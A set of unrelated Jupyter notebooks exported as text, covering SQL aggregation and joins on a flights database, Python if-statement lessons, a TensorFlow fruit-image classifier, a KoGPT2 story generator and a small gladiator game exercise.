| sed "s/\/dev\/fd\/63/batch_data\/output\/iris_sample_X_${i}.csv.out/"
done
###Output
_____no_output_____ |
Week_4_SQL_Queries/SQL Aggregation and Join.ipynb | ###Markdown
SQL Aggregation and Join
###Code
import pandas as pd
import sqlite3
conn = sqlite3.connect("data/flights.db")
cur = conn.cursor()
###Output
_____no_output_____
###Markdown
Objectives - Use SQL aggregation functions with GROUP BY- Use HAVING for group filtering- Use SQL JOIN to combine tables using keys Aggregating Functions > A SQL **aggregating function** takes in many values and returns one value. We have already seen some SQL aggregating functions like `COUNT()`. There are also others, like SUM(), AVG(), MIN(), and MAX(). Example Simple Aggregations
###Code
# Max value for longitude
pd.read_sql('''
SELECT
-- Note we have to cast to a numerical value first
MAX(CAST(longitude AS REAL))
FROM airports
''', conn)
# Max value for id in table
pd.read_sql('''
SELECT
MAX(CAST(id AS integer))
FROM
airports
''', conn)
# Effectively counts all the inactive airlines
pd.read_sql('''
SELECT COUNT()
FROM airlines
WHERE active='N'
''', conn)
###Output
_____no_output_____
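The other aggregate functions follow the same pattern. Here is a quick sketch (assuming the same `conn` connection and `airports` table used throughout this notebook) that computes the minimum, maximum, and average altitude in one query:
```python
pd.read_sql('''
SELECT
    MIN(CAST(altitude AS REAL)) AS lowest_altitude,
    MAX(CAST(altitude AS REAL)) AS highest_altitude,
    AVG(CAST(altitude AS REAL)) AS average_altitude
FROM airports
''', conn)
```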
###Markdown
We can also give aliases to our aggregations:
###Code
# Effectively counts all the active airlines
pd.read_sql('''
SELECT
COUNT() AS number_of_active_airlines
FROM
airlines
WHERE
active='Y'
''', conn)
###Output
_____no_output_____
###Markdown
Grouping in SQL We can go deeper and use aggregation functions on _groups_ using the `GROUP BY` clause. The `GROUP BY` clause will group one or more columns together with the same values as one group to perform aggregation functions on. Example `GROUP BY` Statements Let's say we want to know how many active and non-active airlines there are. Without `GROUP BY` Let's first start with just seeing how many airlines there are:
###Code
df_results = pd.read_sql('''
SELECT
-- Reminder that this counts the number of rows before the SELECT
COUNT() AS number_of_airlines
FROM
airlines
''', conn)
df_results
###Output
_____no_output_____
###Markdown
One way for us to get the counts for each is to create two queries that will filter each kind of airline (active vs non-active) and count those values:
###Code
df_active = pd.read_sql('''
SELECT
COUNT() AS number_of_active_airlines
FROM
airlines
WHERE
active='Y'
''', conn)
df_not_active = pd.read_sql('''
SELECT
COUNT() AS number_of_not_active_airlines
FROM
airlines
WHERE
active='N'
''', conn)
display(df_active)
display(df_not_active)
###Output
_____no_output_____
###Markdown
This works but it's inefficient. With `GROUP BY` Instead, we can tell the SQL server to do the work for us by grouping values we care about for us!
###Code
df_results = pd.read_sql('''
SELECT
COUNT() AS number_of_airlines
FROM
airlines
GROUP BY
active
''', conn)
df_results
###Output
_____no_output_____
###Markdown
This is great! And if you look closely, you can observe we have _three_ different groups instead of our expected two! Let's also print out the `airlines.active` value for each group/aggregation so we know what we're looking at:
###Code
df_results = pd.read_sql('''
SELECT
airlines.active,
COUNT() AS number_of_airlines
FROM
airlines
GROUP BY
airlines.active
''', conn)
df_results
###Output
_____no_output_____
###Markdown
Group Task - Which countries have the highest numbers of active airlines? Return the top 10.
###Code
pd.read_sql('''
SELECT
*
FROM
airlines
''', conn)
###Output
_____no_output_____
###Markdown
Possible Solution```python pd.read_sql(''' SELECT COUNT() AS num, country FROM airlines WHERE active='Y' GROUP BY country ORDER BY num DESC LIMIT 10 ''', conn)``` > Note that the `GROUP BY` clause is considered _before_ the `ORDER BY` and `LIMIT` clauses Exercise: Grouping - Run a query that will return the number of airports by time zone. Each row should have a number of airports and a time zone.
###Code
# Your code here
###Output
_____no_output_____
###Markdown
Possible Solution```pythonpd.read_sql(''' SELECT airports.timezone ,COUNT() AS num_of_airports FROM airports GROUP BY airports.timezone ORDER BY num_of_airports DESC''', conn) ``` Filtering Groups with `HAVING` We showed that you can filter tables with `WHERE`. We can similarly filter _groups/aggregations_ using `HAVING` clauses. Examples of Using `HAVING` Simple Filtering - Number of Airlines in a Country Let's come back to the aggregation of active airlines:
###Code
pd.read_sql('''
SELECT
COUNT() AS num,
country
FROM
airlines
WHERE
active='Y'
GROUP BY
country
ORDER BY
num DESC
''', conn)
###Output
_____no_output_____
###Markdown
We can see we have a lot of results. But maybe we only want to keep the countries that have more than $30$ active airlines:
###Code
pd.read_sql('''
SELECT
country,
COUNT() AS num
FROM
airlines
WHERE
active='Y'
GROUP BY
country
HAVING
num > 30
ORDER BY
num DESC
''', conn)
###Output
_____no_output_____
###Markdown
Filtering Different Aggregations - Airport Altitudes We can also filter on other aggregations. For example, let's say we want to investigate the `airports` table. Specifically, we want to know the height of the _highest airport_ in a country given that it has _at least $100$ airports_. Looking at the `airports` Table
###Code
df_airports = pd.read_sql('''
SELECT
*
FROM
airports
''', conn)
df_airports.head()
###Output
_____no_output_____
###Markdown
Looking at the Highest Airport Let's first get the highest altitude for each airport:
###Code
pd.read_sql('''
SELECT
airports.country
,MAX(
CAST(airports.altitude AS REAL)
) AS highest_airport_in_country
FROM
airports
GROUP BY
airports.country
ORDER BY
airports.country
''', conn)
###Output
_____no_output_____
###Markdown
Looking at the Number of Airports Too We can also get the number of airports for each country.
###Code
pd.read_sql('''
SELECT
airports.country
,MAX(
CAST(airports.altitude AS REAL)
) AS highest_airport_in_country
,COUNT() AS number_of_airports_in_country
FROM
airports
GROUP BY
airports.country
ORDER BY
airports.country
''', conn)
###Output
_____no_output_____
###Markdown
Filtering on Aggregations > Recall:>> We want to know the height of the _highest airport_ in a country given that it has _at least $100$ airports_.
###Code
pd.read_sql('''
SELECT
airports.country
,MAX(
CAST(airports.altitude AS REAL)
) AS highest_airport_in_country
-- Note we don't have to include this in our SELECT
,COUNT() AS number_of_airports_in_country
FROM
airports
GROUP BY
airports.country
HAVING
COUNT() >= 100
ORDER BY
airports.country
''', conn)
###Output
_____no_output_____
###Markdown
Joins The biggest advantage of using a relational database (like the one we've been querying with SQL) is that you can create **joins**. > By using **`JOIN`** in our query, we can connect different tables using their _relationships_ to other tables.>> Usually we use a key (*foreign key*) to tell us how the two tables are related. There are different types of joins and each has its own use case. `INNER JOIN` > An **inner join** will join two tables together and only keep rows if the _key is in both tables_  Example of an inner join:``` sqlSELECT table1.column_name, table2.different_column_nameFROM table1 INNER JOIN table2 ON table1.shared_column_name = table2.shared_column_name```
###Code
pd.read_sql('''
SELECT
*
FROM
routes
''', conn)
###Output
_____no_output_____
###Markdown
This is great but notice the `airline_id` column. It'd be nice to have some more information about the airlines associated with these routes. We can do an **inner join** to get this information! Inner Join Routes & Airline Data
###Code
pd.read_sql('''
SELECT
*
FROM
routes
INNER JOIN airlines
ON routes.airline_id = airlines.id
''', conn)
###Output
_____no_output_____
###Markdown
We can also specify that we want to retain only certain columns in the `SELECT` clause:
###Code
pd.read_sql('''
SELECT
routes.source AS departing
,routes.dest AS destination
,routes.stops AS stops_before_destination
,airlines.name AS airline
FROM
routes
INNER JOIN airlines
ON routes.airline_id = airlines.id
''', conn)
###Output
_____no_output_____
###Markdown
Note: Losing Data with Inner Joins Since data rows are kept only if _both_ tables have the key, some data can be lost
###Code
df_all_routes = pd.read_sql('''
SELECT
*
FROM
routes
''', conn)
df_routes_after_join = pd.read_sql('''
SELECT
*
FROM
routes
INNER JOIN airlines
ON routes.airline_id = airlines.id
''', conn)
# Look at how the number of rows are different
df_all_routes.shape, df_routes_after_join.shape
###Output
_____no_output_____
###Markdown
If you want to keep your data from at least one of your tables, you should use a left join instead of an inner join. `LEFT JOIN` > A **left join** will join two tables together but will keep all data from the first (left) table using the key provided.  Example of a left join:```sqlSELECT table1.column_name, table2.different_column_nameFROM table1 LEFT JOIN table2 ON table1.shared_column_name = table2.shared_column_name```
###Code
df_all_routes = pd.read_sql('''
SELECT
*
FROM
routes
''', conn)
# This will lose some data (some routes not included)
df_routes_after_inner_join = pd.read_sql('''
SELECT
*
FROM
routes
INNER JOIN airlines
ON routes.airline_id = airlines.id
''', conn)
# The number of rows are different
df_all_routes.shape, df_routes_after_inner_join.shape
###Output
_____no_output_____
###Markdown
If wanted to ensure we always had every route even if the key in `airlines` was not found, we could replace our `INNER JOIN` with a `LEFT JOIN`:
###Code
# This will include all the data from routes
df_routes_after_left_join = pd.read_sql('''
SELECT
*
FROM
routes
LEFT JOIN airlines
ON routes.airline_id = airlines.id
''', conn)
df_routes_after_left_join.shape
###Output
_____no_output_____
###Markdown
Exercise: Joins Which airline has the most routes listed in our database?
###Code
# Your code here
###Output
_____no_output_____ |
Data Science Academy/PythonFundamentos/Cap12/DSA-Python-Cap12-Mini-Projeto4.ipynb | ###Markdown
Data Science Academy - Python Fundamentos - Chapter 12 Download: http://github.com/dsacademybr Mini-Project 4 - Artificial Intelligence in Agriculture **ATTENTION**This Mini-Project is an intermediate/advanced-level bonus, and what we present here is only a demonstration. The concepts needed to run this Mini-Project are studied in detail in the Formação Inteligência Artificial and Formação Inteligência Artificial Aplicada à Medicina programs here at DSA.  Problem DefinitionSee the PDF manual in Chapter 12 of the course. Data SourceSee the PDF manual in Chapter 12 of the course. Installing and Loading Packages
###Code
# Python language version
from platform import python_version
print('Python version used in this Jupyter Notebook:', python_version())
# Install TensorFlow
#!pip install -q tensorflow==2.5
# Imports
import sklearn
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from pathlib import Path
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers.experimental.preprocessing import RandomFlip
from tensorflow.keras.layers.experimental.preprocessing import RandomRotation
from tensorflow.keras.layers.experimental.preprocessing import RandomZoom
from tensorflow.keras.applications import EfficientNetB3
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.metrics import Precision
from tensorflow.keras.metrics import Recall
# Seed for reproducibility
tf.random.set_seed(4)
###Output
_____no_output_____
###Markdown
Loading the Data (Images)
###Code
# Current directory
diretorio_atual = Path.cwd()
print(diretorio_atual)
# Path to the training data
caminho_dados_treino = Path("fruits-360/Training")
# Path to the test data
caminho_dados_teste = Path("fruits-360/Test")
# List the folder contents
imagens_treino = list(caminho_dados_treino.glob("*/*"))
# View a sample of the list
imagens_treino[925:936]
# Lambda expression that extracts just the path string of each image
imagens_treino = list(map(lambda x: str(x), imagens_treino))
# View a sample of the list
imagens_treino[925:936]
# Total number of training images
len(imagens_treino)
###Output
_____no_output_____
###Markdown
Data Preprocessing
###Code
# Function that gets the label of each image
def extrai_label(caminho_imagem):
    return caminho_imagem.split("/")[-2]
# Apply the function
imagens_treino_labels = list(map(lambda x: extrai_label(x), imagens_treino))
# View a sample
imagens_treino_labels[840:846]
###Output
_____no_output_____
###Markdown
> Label encoding (converting strings to numeric values)
###Code
# Create the encoder object
encoder = LabelEncoder()
# Apply fit_transform
imagens_treino_labels = encoder.fit_transform(imagens_treino_labels)
# View a sample
imagens_treino_labels[840:846]
# Apply one-hot encoding to the labels
imagens_treino_labels = tf.keras.utils.to_categorical(imagens_treino_labels)
# View a sample
imagens_treino_labels[840:846]
# Split the training data into two samples: train and validation
X_treino, X_valid, y_treino, y_valid = train_test_split(imagens_treino, imagens_treino_labels)
X_treino[15:18]
y_treino[15:18]
###Output
_____no_output_____
###Markdown
Dataset Augmentation
###Code
# Resize all images to 224 x 224
img_size = 224
resize = tf.keras.Sequential([tf.keras.layers.experimental.preprocessing.Resizing(img_size, img_size)])
# Create the dataset augmentation object
data_augmentation = tf.keras.Sequential([RandomFlip("horizontal"),
RandomRotation(0.2),
RandomZoom(height_factor = (-0.3,-0.2)) ])
###Output
_____no_output_____
###Markdown
Preparing the Data
###Code
# Hyperparameters
batch_size = 32
autotune = tf.data.experimental.AUTOTUNE
# Function to load and transform the images
def carrega_transforma(image, label):
    image = tf.io.read_file(image)
    image = tf.io.decode_jpeg(image, channels = 3)
    return image, label
# Function to prepare the data in TensorFlow format
def prepara_dataset(path, labels, train = True):
    # Prepare the data
image_paths = tf.convert_to_tensor(path)
labels = tf.convert_to_tensor(labels)
image_dataset = tf.data.Dataset.from_tensor_slices(image_paths)
label_dataset = tf.data.Dataset.from_tensor_slices(labels)
dataset = tf.data.Dataset.zip((image_dataset, label_dataset))
dataset = dataset.map(lambda image, label: carrega_transforma(image, label))
dataset = dataset.map(lambda image, label: (resize(image), label), num_parallel_calls = autotune)
dataset = dataset.shuffle(1000)
dataset = dataset.batch(batch_size)
    # If train = True, apply dataset augmentation
if train:
dataset = dataset.map(lambda image, label: (data_augmentation(image), label), num_parallel_calls = autotune)
    # Repeat over the dataset and return
dataset = dataset.repeat()
return dataset
# Create the training dataset
dataset_treino = prepara_dataset(X_treino, y_treino)
# Shape
imagem, label = next(iter(dataset_treino))
print(imagem.shape)
print(label.shape)
# Let's view an image and a label
print(encoder.inverse_transform(np.argmax(label, axis = 1))[0])
plt.imshow((imagem[0].numpy()/255).reshape(224,224,3))
# Create the validation dataset
dataset_valid = prepara_dataset(X_valid, y_valid, train = False)
# Shape
imagem, label = next(iter(dataset_valid))
print(imagem.shape)
print(label.shape)
###Output
(32, 224, 224, 3)
(32, 131)
###Markdown
Building the Model
###Code
# Load a pretrained model
modelo_pre = EfficientNetB3(input_shape = (224,224,3), include_top = False)
# Add our own layers on top of modelo_pre
modelo = tf.keras.Sequential([modelo_pre,
                              tf.keras.layers.GlobalAveragePooling2D(),
                              tf.keras.layers.Dense(131, activation = 'softmax')])
# Model summary
modelo.summary()
# Hyperparameters
lr = 0.001
beta1 = 0.9
beta2 = 0.999
ep = 1e-07
# Compile the model
modelo.compile(optimizer = Adam(learning_rate = lr,
beta_1 = beta1,
beta_2 = beta2,
epsilon = ep),
loss = 'categorical_crossentropy',
metrics = ['accuracy', Precision(name = 'precision'), Recall(name = 'recall')])
###Output
_____no_output_____
###Markdown
> Let's train the model for just one epoch and check the metrics. **Note**: If you train the model on a computer without a GPU, training time will be quite long, probably many hours. Practice patience and wait.
###Code
%%time
history = modelo.fit(dataset_treino,
steps_per_epoch = len(X_treino)//batch_size,
epochs = 1,
validation_data = dataset_valid,
validation_steps = len(y_treino)//batch_size)
###Output
1586/1586 [==============================] - 567s 358ms/step - loss: 0.2437 - accuracy: 0.9369 - precision: 0.9676 - recall: 0.9173 - val_loss: 2.8520 - val_accuracy: 0.5486 - val_precision: 0.5955 - val_recall: 0.5219
CPU times: user 22min 39s, sys: 1min 46s, total: 24min 26s
Wall time: 9min 39s
###Markdown
> Let's train the model for 6 more epochs to improve performance, applying a few techniques to avoid overfitting.
###Code
# We no longer need to train modelo_pre, so freeze it
modelo.layers[0].trainable = False
# Checkpoint
checkpoint = tf.keras.callbacks.ModelCheckpoint("modelo/melhor_modelo.h5",
                                                 verbose = 1,
                                                 save_best_only = True,
                                                 save_weights_only = True)
# Early stop
early_stop = tf.keras.callbacks.EarlyStopping(patience = 4)
# Summary
modelo.summary()
%%time
history = modelo.fit(dataset_treino,
steps_per_epoch = len(X_treino)//batch_size,
epochs = 6,
validation_data = dataset_valid,
validation_steps = len(y_treino)//batch_size,
callbacks = [checkpoint, early_stop])
###Output
Epoch 1/6
2/1586 [..............................] - ETA: 3:49 - loss: 0.0466 - accuracy: 0.9844 - precision: 0.9844 - recall: 0.9844WARNING:tensorflow:Callbacks method `on_train_batch_end` is slow compared to the batch time (batch time: 0.1046s vs `on_train_batch_end` time: 0.1825s). Check your callbacks.
1586/1586 [==============================] - ETA: 0s - loss: 0.0602 - accuracy: 0.9839 - precision: 0.9858 - recall: 0.9819
Epoch 00001: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 566s 357ms/step - loss: 0.0602 - accuracy: 0.9839 - precision: 0.9858 - recall: 0.9819 - val_loss: 1.9028 - val_accuracy: 0.6720 - val_precision: 0.6956 - val_recall: 0.6538
Epoch 2/6
1586/1586 [==============================] - ETA: 0s - loss: 0.0447 - accuracy: 0.9873 - precision: 0.9887 - recall: 0.9861
Epoch 00002: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 575s 363ms/step - loss: 0.0447 - accuracy: 0.9873 - precision: 0.9887 - recall: 0.9861 - val_loss: 1.1099 - val_accuracy: 0.6940 - val_precision: 0.7524 - val_recall: 0.6507
Epoch 3/6
1586/1586 [==============================] - ETA: 0s - loss: 0.0338 - accuracy: 0.9902 - precision: 0.9914 - recall: 0.9896
Epoch 00003: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 574s 362ms/step - loss: 0.0338 - accuracy: 0.9902 - precision: 0.9914 - recall: 0.9896 - val_loss: 0.6123 - val_accuracy: 0.8433 - val_precision: 0.8653 - val_recall: 0.8270
Epoch 4/6
1586/1586 [==============================] - ETA: 0s - loss: 0.0348 - accuracy: 0.9903 - precision: 0.9911 - recall: 0.9895
Epoch 00004: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 571s 360ms/step - loss: 0.0348 - accuracy: 0.9903 - precision: 0.9911 - recall: 0.9895 - val_loss: 0.9220 - val_accuracy: 0.8092 - val_precision: 0.8311 - val_recall: 0.7916
Epoch 5/6
1586/1586 [==============================] - ETA: 0s - loss: 0.0210 - accuracy: 0.9940 - precision: 0.9943 - recall: 0.9937
Epoch 00005: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 578s 365ms/step - loss: 0.0210 - accuracy: 0.9940 - precision: 0.9943 - recall: 0.9937 - val_loss: 0.6389 - val_accuracy: 0.8625 - val_precision: 0.8739 - val_recall: 0.8543
Epoch 6/6
1586/1586 [==============================] - ETA: 0s - loss: 0.0274 - accuracy: 0.9924 - precision: 0.9930 - recall: 0.9920
Epoch 00006: saving model to modelo/melhor_modelo.h5
1586/1586 [==============================] - 576s 363ms/step - loss: 0.0274 - accuracy: 0.9924 - precision: 0.9930 - recall: 0.9920 - val_loss: 0.7594 - val_accuracy: 0.8290 - val_precision: 0.8488 - val_recall: 0.8158
CPU times: user 2h 14min 51s, sys: 10min 28s, total: 2h 25min 20s
Wall time: 57min 22s
###Markdown
Model Evaluation
###Code
# To load the weights, we need to unfreeze the layers
modelo.layers[0].trainable = True
# Load the checkpoint weights and re-evaluate
modelo.load_weights("modelo/melhor_modelo.h5")
###Output
_____no_output_____
###Markdown
> Load the test data.
###Code
# Load and prepare the test data
caminho_imagens_teste = list(caminho_dados_teste.glob("*/*"))
imagens_teste = list(map(lambda x: str(x), caminho_imagens_teste))
imagens_teste_labels = list(map(lambda x: extrai_label(x), imagens_teste))
imagens_teste_labels = encoder.fit_transform(imagens_teste_labels)
imagens_teste_labels = tf.keras.utils.to_categorical(imagens_teste_labels)
test_image_paths = tf.convert_to_tensor(imagens_teste)
test_image_labels = tf.convert_to_tensor(imagens_teste_labels)
# Function to decode the images
def decode_imagens(image, label):
image = tf.io.read_file(image)
image = tf.io.decode_jpeg(image, channels = 3)
image = tf.image.resize(image, [224,224], method = "bilinear")
return image, label
# Create the test dataset
dataset_teste = (tf.data.Dataset
.from_tensor_slices((imagens_teste, imagens_teste_labels))
.map(decode_imagens)
.batch(batch_size))
# Shape
imagem, label = next(iter(dataset_teste))
print(imagem.shape)
print(label.shape)
# View a test image
print(encoder.inverse_transform(np.argmax(label, axis = 1))[0])
plt.imshow((imagem[0].numpy()/255).reshape(224,224,3))
# Evaluate the model
loss, acc, prec, rec = modelo.evaluate(dataset_teste)
print("Accuracy: ", acc)
print("Precision: ", prec)
print("Recall: ", rec)
###Output
Accuracy:  0.7615920305252075
Precision:  0.7857208847999573
Recall:  0.7499118447303772
###Markdown
Predictions with the Trained Model
###Code
# Function to load a new image
def carrega_nova_imagem(image_path):
image = tf.io.read_file(image_path)
image = tf.io.decode_jpeg(image, channels = 3)
image = tf.image.resize(image, [224,224], method = "bilinear")
plt.imshow(image.numpy()/255)
image = tf.expand_dims(image, 0)
return image
# Function to make predictions
def faz_previsao(image_path, model, enc):
image = carrega_nova_imagem(image_path)
prediction = model.predict(image)
pred = np.argmax(prediction, axis = 1)
return enc.inverse_transform(pred)[0]
# Prediction
faz_previsao("imagens/imagem1.jpg", modelo, encoder)
# Prediction
faz_previsao("imagens/imagem2.jpg", modelo, encoder)
# Prediction
faz_previsao("imagens/imagem3.jpg", modelo, encoder)
# Prediction
faz_previsao("imagens/imagem4.jpg", modelo, encoder)
# Prediction
faz_previsao("imagens/imagem5.jpg", modelo, encoder)
###Output
_____no_output_____ |
III_01.ipynb | ###Markdown
__III. Building the structure of a program! Control statements__--- __1. The if statement__* __'If you have money, take a taxi; if you have no money, walk.'__* Since programming is done by people, there are times when, just like the sentence above, a given condition must be evaluated and each situation handled accordingly* In other words, the if statement is what programming uses to evaluate a condition and execute the code that matches it
###Code
'''The situation above can be expressed in Python as follows.'''
money = 1
if money :
    print('Take a taxi')
else :
    print('Walk')
###Output
Take a taxi
###Markdown
* The figure below shows the process by which the sentence 'Take a taxi' gets printed __1) Basic structure of the if statement__ if condition:statement 1statement 2else:statement Astatement B * The condition is tested: if it is true, the statements right after the __if__ (the if block) are executed; if it is false, the statements after the __else__ (the else block) are executed* So an __else__ cannot be used on its own without an __if__ __A. Indentation__* When writing an __if__ statement ```pythonif condition : every statement belonging to the if block, starting from the line immediately below, must be indented```
###Code
money = 1
if money :
    print('Take')
    print('a')
    print('taxi')
###Output
Take
a
taxi
###Markdown
* Writing it like this raises an error```pythonif condition : statement1statement2 statement3``````pythonif condition : statement1 statement2 statement3```* Let's try it ourselves
###Code
money = 1
if money :
    print('Take')
print('a')
    print('taxi')
money = 1
if money :
    print('Take')
        print('a')
    print('taxi')
###Output
_____no_output_____
###Markdown
* So, is it better to indent with __spaces [SpaceBar]__ or with __tabs [Tab]__?* The debate over this still goes on* The one thing both camps agree on: don't mix the two* These days the Python community recommends 4 __spaces [SpaceBar]__ for indentation __2) What is a condition?__* The 'condition' of an if statement is an expression that evaluates to true or false* Revisiting the truthiness of a few data types: | Data type | True | False || :-: | :-: | :-: || __Number__ | any non-zero number | 0 || __String__ | 'abc' | "" || __List__ | [1, 2, 3] | [] || __Tuple__ | (1, 2, 3) | () || __Dictionary__ | {'a' : 'b'} | {} | * So in the taxi example we saw earlier, the condition is money```pythonmoney = 1if money :```* Since money is 1, the condition is true and the statement after the __if__ is executed __A. Comparison operators__* When testing whether a condition is true or false, comparison operators are used far more often than raw truthiness | Comparison operator | Meaning || :-: | :-: || __$ x < y $__ | $ x $ is less than $ y $ || __$ x > y $__ | $ x $ is greater than $ y $ || __$ x == y $__ | $ x $ equals $ y $|| __$ x != y $__ | $ x $ does not equal $ y $ || __$ x >= y $__ | $ x $ is greater than or equal to $ y $ || __$ x <= y $__ | $ x $ is less than or equal to $ y $ |
###Code
x = 3
y = 2
print(x > y)
print(x < y)
print(x == y)
print(x != y)
'''If you have 3000 won or more, take a taxi; otherwise, walk'''
money = 2000
if money >= 3000 :
    print('Take a taxi')
else :
    print('Walk')
# Since the condition money >= 3000 is false, the statement after else is executed
###Output
Walk
###Markdown
__B. and, or, not__* Other operators used to evaluate conditions are and, or, and not. | Operator | Meaning || :-: | :-: || __x or y__ | true if at least one of x and y is true || __x and y__ | true only if both x and y are true || __not x__ | true if x is false |
###Code
'''If you have 3000 won or more, or you have a card, take a taxi; otherwise, walk'''
money = 2000
card = 1
if money >= 3000 or card :
    print('Take a taxi')
else :
    print('Walk')
# money is 2000, but card is 1, so the condition money >= 3000 or card is true
# Therefore the statement after the if, 'Take a taxi', is executed
###Output
Take a taxi
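Only `or` appears in the cell above; a minimal sketch of `and` and `not` with the same variables:
```python
money = 2000
card = 1
print(money >= 3000 and card)  # False: the first condition fails
if not money >= 3000:          # not flips a false condition to true
    print('Walk')
```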
###Markdown
__다. 다른 언어에서 볼수 없는 조건문__* 더 나아가 파이썬은 다른 프로그래밍 언어에서 쉽게 볼 수 없는 재미있는 조건문들을 제공한다
###Code
print(1 in [1, 2, 3])
print(1 not in [1, 2, 3])
###Output
True
False
###Markdown
* The first example is the condition 'is 1 in the list [1, 2, 3]?'Since 1 is in [1, 2, 3], the condition is true and returns True* The second example is the condition 'is 1 not in the list [1, 2, 3]?'Since 1 is in [1, 2, 3], the condition is false and returns False
###Code
'''If there is money in your pocket, take a taxi; if not, walk'''
pocket = ['paper', 'cellphone', 'money']
if 'money' in pocket :
    print('Take a taxi')
else :
    print('Walk')
'''What if you want a condition to do nothing at all?'''
'''If there is money in your pocket, do nothing; if there is no money, pull out your card'''
pocket = ['paper', 'cellphone', 'money']
if 'money' in pocket :
    pass
else :
    print('Pull out your card')
# Because the string money is in the list pocket,
# the pass after the if is executed and nothing is printed
if 'money' in pocket : pass
else : print('Pull out your card')
###Output
_____no_output_____
###Markdown
If you want a condition to do nothing at all, just write pass where the statements would go!If an if or else clause has only one statement to run, you may write it right after the colon without a line break. __D. elif for evaluating multiple conditions__* With if and else alone, it is hard to evaluate a variety of conditions
###Code
'''If there is money in your pocket, take a taxi; if there is no money but you have a card, take a taxi; if you have neither money nor a card, walk'''
pocket = ['paper', 'cellphone']
card = 1
if 'money' in pocket :
    print('Take a taxi')
else :
    if card :
        print('Take a taxi')
    else :
        print('Walk')
'''Using elif'''
pocket = ['paper', 'cellphone']
card = 1
if 'money' in pocket :      # if there is money in your pocket
    print('Take a taxi')
elif card :                 # if there is no money but there is a card
    print('Take a taxi')
else :                      # if there is neither money nor a card
    print('Walk')
###Output
Take a taxi
|
Examples/ModelFlow features/modefflow diff.ipynb | ###Markdown
Stability
###Code
geteigen(mul=0.5,acc=0,years=30,show=1)
###Output
_____no_output_____
###Markdown
Explosion
###Code
geteigen(mul=0.9,acc=2,years=30,show=1)
###Output
_____no_output_____
###Markdown
Exploding oscillations
###Code
geteigen(mul=0.6,acc=2,years=30,show=1)
###Output
_____no_output_____
###Markdown
Perpetual oscillations
###Code
geteigen(mul=0.5,acc=2,years=30,show=1)
###Output
_____no_output_____
###Markdown
Dampened oscillations
###Code
geteigen(mul=0.7,acc=1,years=30,show=1)
###Output
_____no_output_____ |
3_story_generator.ipynb | ###Markdown
Story Generator 1. Ready 1.1 Import basic packages
###Code
import torch
from transformers import PreTrainedTokenizerFast
from transformers import GPT2LMHeadModel
###Output
_____no_output_____
###Markdown
1.2 Download the pretrained model
###Code
MODEL_NAME = "skt/kogpt2-base-v2"
###Output
_____no_output_____
###Markdown
1.3 Load the tokenizer
###Code
tokenizer = PreTrainedTokenizerFast.from_pretrained(MODEL_NAME)
TOKENS_DICT = {
'bos_token':'<s>',
'eos_token':'</s>',
'unk_token':'<unk>',
'pad_token':'<pad>',
'mask_token':'<mask>'
}
# Add the special tokens to the tokenizer; the model's embeddings are resized to match the modified tokenizer
tokenizer.add_special_tokens(TOKENS_DICT)
print(tokenizer.special_tokens_map)
###Output
The tokenizer class you load from this checkpoint is not the same type as the class this function is called from. It may result in unexpected tokenization.
The tokenizer class you load from this checkpoint is 'GPT2Tokenizer'.
The class this function is called from is 'PreTrainedTokenizerFast'.
###Markdown
1.4 Load the fine-tuned model
###Code
from util.generator import sample_sequence as gen
from util.model import model_loading as load
checkpointPath = "./model/tale_model.tar"
loading = True
model,ckp = load(checkpointPath, PU = 'cpu', status = loading)
print(ckp['epoch'], ckp['loss'])
vocab_path = "./data/정제/index_tale_plus_novel.txt"
# The prompt stays in Korean ("이른 아침" = "early morning"), since KoGPT2 is a Korean-language model
context = \
"""
이른 아침
"""
generated = gen(
vocab=vocab_path,
model=model,
length=500,
context=context,
num_samples=1,
repetition_penalty=2.0,
top_p=0.9,
tokenizer = tokenizer)
print(tokenizer.decode(generated[0]))
###Output
9%|▉ | 18/200 [00:00<00:09, 18.76it/s] |
_notebooks/2021-07-08-Spartacus.ipynb | ###Markdown
**War Games**: The GladiatorsIn Ancient Rome, gladiators fought one another in the arena for the entertainment of the Emperor and the public. The spectacle, violent and bloody, was to the death. Today we will write a small game in Python that lets us simulate a gladiator match against the computer!A gladiator (the computer) hides in a 5-by-5-meter arena. On each play, it is placed at a random position (x,y) in the arena.The user must then place their own player (the opponent) in the arena. The gladiator has an attack zone of radius *r*, as the figure shows, and the game follows these rules:[Example: Gladiator Arena](https://drive.google.com/file/d/1tpsjlYXm5R6ajf0-JL1luAXFz79xEPWY/view?usp=sharing)* If the opponent is far from the gladiator, they escape with their life!* If the opponent is inside the gladiator's attack zone **and the gladiator is in attack mode**, the gladiator decapitates the opponent instantly. Being "in attack mode" should be random behavior;* If the opponent is inside the gladiator's attack zone **and the gladiator is not in attack mode**, the gladiator is killed.We can assume the following:* At most 10 plays are allowed;* The gladiator's attack radius is 2 meters;* On each play, the program should report whether or not the opponent escaped with their life;* At the end of all the plays, the total number of victims and survivors should be printed. However, if the gladiator is killed on some play, the program should stop and report the number of victims and survivors up to that point and the number of plays it took to kill him!**Note:**The distance between two points A and B is measured as follows: $d(A,B) = \sqrt{(xA - xB)^2 + (yA - yB)^2}$
###Code
# ARdC exercise: Challenge the Gladiator
import random
# Constants
ATTACK_RANGE = 2
X_ARENA = 5
Y_ARENA = 5
# 1. PLACE THE GLADIATOR IN THE ARENA
def place_gladiator():
x_glad = random.random() * X_ARENA
y_glad = random.random() * Y_ARENA
attack = random.choice([True, False]) # Single random element from a sequence
return {
"X": x_glad,
"Y": y_glad,
"Attack": attack
}
# 2. PLACE THE PLAYER IN THE ARENA
def call_input(dimension):
return float(input("Indicate your %s positioning in the arena: " % dimension))
def place_player():
print("The arena has a 5 x 5 meters area. You have to chose your position within these dimensions.")
x_player = call_input("horizontal")
while x_player < 0 or x_player > X_ARENA:
x_player = call_input("horizontal")
y_player = call_input("vertical")
while y_player < 0 or y_player > Y_ARENA:
y_player = call_input("vertical")
return {
"X": x_player,
"Y": y_player
}
# 3. CALCULATE THE DISTANCE BETWEEN THE GLADIATOR AND THE PLAYER
def dist_glad_to_player(x_glad, x_play, y_glad, y_play):
return ((x_glad - x_play) ** 2 + (y_glad - y_play) ** 2) ** 0.5
# DRIVER CODE
